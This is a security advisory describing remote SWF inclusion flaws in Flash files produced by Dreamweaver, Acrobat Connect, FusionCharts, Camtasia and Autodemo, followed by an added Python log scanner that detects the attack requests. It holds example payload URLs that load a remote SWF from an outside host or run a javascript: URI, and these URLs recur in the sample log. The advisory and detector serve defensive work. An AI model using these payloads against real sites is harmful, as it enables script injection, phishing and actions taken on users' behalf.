Possible remote SWF inclusion

Published on 2009-11-11. Updated on 2009-11-11.

Description:
A number of products used to create SWF files (Techsmith Camtasia, InfoSoft FusionCharts, Adobe Acrobat Connect, Macromedia Breeze, Adobe Dreamweaver, Adobe Contribute, Autodemo) were found to be vulnerable to remote SWF inclusion: a query-string parameter of the generated SWF is used as a URL to load further content, without restricting it to the site's own origin. The scanned page embeds a SWF file that may be affected by one of these vulnerabilities.

  • Adobe Dreamweaver and Contribute:
    The "skinName" parameter loads an arbitrary flash file:
    http://www.example.com/FLVPlayer_Progressive.swf?skinName=http://rcannings.googlepages.com/DoKnowEvil
  • Adobe Acrobat Connect (including Macromedia Breeze):
    The "baseurl" parameter loads an arbitrary flash file:
    http://www.example.com/main.swf?baseurl=http://rcannings.googlepages.com/DoKnowEvil.swf%3f
  • InfoSoft FusionCharts:
    The "dataURL" parameter loads an arbitrary flash file:
    http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//rcannings.googlepages.com/DoKnowEvil.swf%3F.jpg%22%3E
  • Techsmith Camtasia:
    The "csPreloader" parameter loads an arbitrary flash file:
    http://www.example.com/Example_controller.swf?csPreloader=http://rcannings.googlepages.com/DoKnowEvil.swf%3f
  • Autodemo:
    The "onend" parameter loads arbitrary URLs including the JavaScript protocol handler:
    http://www.example.com/control.swf?onend=javascript:alert(1)//
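The parameter names listed above are what a defender can detect on. The following Python is an added example (not code from the original alert or from any of the vendors named): it reads web server access log lines, picks out requests for .swf files, and flags the listed parameters when their value carries a URL pointing at a host other than the site's own, or a javascript: URI. It handles the nested percent-encoding and the value embedded inside injected HTML that the FusionCharts example uses. The site host, the log lines and the log format are constructed for the example.

```python
"""Detect the remote SWF inclusion request patterns from the alert above.

Added example, not code from the original page. Assumptions: access log
lines in common log format with a quoted "GET /target HTTP/1.x" request,
and the site's own hostname known to the caller.
"""
import re
from typing import Optional
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameter names from the advisory, lower-cased, mapped to the product.
SUSPECT_PARAMS = {
    "skinname": "Adobe Dreamweaver / Contribute",
    "baseurl": "Adobe Acrobat Connect / Macromedia Breeze",
    "dataurl": "InfoSoft FusionCharts",
    "cspreloader": "Techsmith Camtasia",
    "onend": "Autodemo",
}

# An absolute http(s) URL anywhere inside a value. The FusionCharts example
# wraps the URL in injected HTML, so a simple prefix test would miss it.
ABS_URL_RE = re.compile(r"https?://([^/\s\"'<>?#]+)", re.IGNORECASE)

# Request target inside a common-log-format line (constructed format).
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def decode_value(value: str) -> str:
    """Undo up to two extra layers of percent-encoding (examples nest %3f)."""
    for _ in range(2):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def check_param_value(value: str, site_host: str) -> Optional[str]:
    """Return a reason if the value would load off-site content, else None."""
    decoded = decode_value(value).strip()
    if decoded.lower().startswith("javascript:"):
        return "javascript: URI"
    for match in ABS_URL_RE.finditer(decoded):
        # Strip userinfo and port before comparing the host.
        host = match.group(1).lower().split("@")[-1].split(":")[0]
        if host != site_host.lower():
            return f"off-site URL host {host}"
    return None


def scan_request(target: str, site_host: str) -> list:
    """Inspect one request target (path?query) and return a list of findings."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(".swf"):
        return []
    findings = []
    # parse_qsl already removes one layer of percent-encoding and '+' spaces.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        product = SUSPECT_PARAMS.get(name.lower())
        if product is None:
            continue
        reason = check_param_value(value, site_host)
        if reason:
            findings.append({"swf": parts.path, "param": name,
                             "product": product, "reason": reason})
    return findings


def scan_log(lines, site_host: str) -> list:
    """Run scan_request over every request line found in the log."""
    findings = []
    for line in lines:
        match = REQ_RE.search(line)
        if match:
            findings.extend(scan_request(match.group(1), site_host))
    return findings


# Constructed sample log: one benign request followed by the five cases
# from the alert, with the query strings exactly as listed there.
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Nov/2009:10:00:01 +0000] "GET /FLVPlayer_Progressive.swf?skinName=Clear_Skin_1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [11/Nov/2009:10:00:02 +0000] "GET /FLVPlayer_Progressive.swf?skinName=http://rcannings.googlepages.com/DoKnowEvil HTTP/1.1" 200 512',
    '203.0.113.5 - - [11/Nov/2009:10:00:03 +0000] "GET /main.swf?baseurl=http://rcannings.googlepages.com/DoKnowEvil.swf%3f HTTP/1.1" 200 512',
    '203.0.113.5 - - [11/Nov/2009:10:00:04 +0000] "GET /Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//rcannings.googlepages.com/DoKnowEvil.swf%3F.jpg%22%3E HTTP/1.1" 200 512',
    '203.0.113.5 - - [11/Nov/2009:10:00:05 +0000] "GET /Example_controller.swf?csPreloader=http://rcannings.googlepages.com/DoKnowEvil.swf%3f HTTP/1.1" 200 512',
    '203.0.113.5 - - [11/Nov/2009:10:00:06 +0000] "GET /control.swf?onend=javascript:alert(1)// HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG, "www.example.com"):
        print(f"{finding['swf']} {finding['param']}={finding['reason']} "
              f"({finding['product']})")
```

Relative skin names and URLs on the site's own host pass, so the check does not fire on the players' normal use. It only sees the query string of the .swf request itself; if the embedding HTML passes the same values through FlashVars instead, the same check_param_value logic has to be applied to the flashvars string of that page.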

Impact:
An attacker could include a remote SWF file and execute arbitrary JavaScript and/or ActionScript code. The attacker can use JavaScript to perform any action on behalf of the user (for example, perform a transaction on an online banking system) or change the way the website appears to the user (for example, perform a phishing attack).

Recommendation:
The product used to create this SWF file (Techsmith Camtasia, InfoSoft FusionCharts, Adobe Acrobat Connect, Macromedia Breeze, Adobe Dreamweaver, Adobe Contribute, Autodemo) should be upgraded to the latest version and the SWF file should be recompiled with the fixed version.

Tags: Scripts

Alert Tags: information_disclosure
ApplicableApplicationServer: All
ApplicableOS: All
ApplicableWebServer: All

References:

  • XSS Vulnerabilities in Common Shockwave Flash Files